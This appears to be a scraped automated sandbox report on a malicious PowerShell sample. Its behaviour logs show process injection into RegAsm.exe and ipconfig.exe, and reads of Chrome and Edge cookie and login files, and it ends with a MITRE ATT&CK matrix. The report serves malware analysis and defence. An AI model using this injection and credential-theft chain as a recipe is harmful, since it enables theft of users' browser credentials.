Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtReadFile: Direct from: 0x77D62ADC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtDelayExecution: Direct from: 0x77D62DDC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtQueryInformationProcess: Direct from: 0x77D62C26	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtResumeThread: Direct from: 0x77D62FBC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtWriteVirtualMemory: Direct from: 0x77D6490C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtCreateUserProcess: Direct from: 0x77D6371C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtClose: Direct from: 0x77D62B6C
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtAllocateVirtualMemory: Direct from: 0x77D63C9C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtSetInformationProcess: Direct from: 0x77D62C5C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtProtectVirtualMemory: Direct from: 0x77D62F9C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtNotifyChangeKey: Direct from: 0x77D63C2C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtWriteVirtualMemory: Direct from: 0x77D62E3C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtSetInformationThread: Direct from: 0x77D563F9	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtCreateMutant: Direct from: 0x77D635CC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtResumeThread: Direct from: 0x77D636AC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtMapViewOfSection: Direct from: 0x77D62D1C	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtAllocateVirtualMemory: Direct from: 0x77D62BFC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtAllocateVirtualMemory: Direct from: 0x77D62BEC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtQueryInformationToken: Direct from: 0x77D62CAC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtCreateFile: Direct from: 0x77D62FEC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtOpenFile: Direct from: 0x77D62DCC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtTerminateThread: Direct from: 0x77D62FCC	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	NtOpenKeyEx: Direct from: 0x77D62B9C	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1081008	Jump to behavior

Source: z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000002.3288558174.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000000.1234510720.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3288830952.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000002.3288558174.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000000.1234510720.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3288830952.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000002.3288558174.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000000.1234510720.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3288830952.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000002.3288558174.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000000.1234510720.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3288830952.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report done1.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
done1.ps1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	123 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	612 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	231 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	51 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	51 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement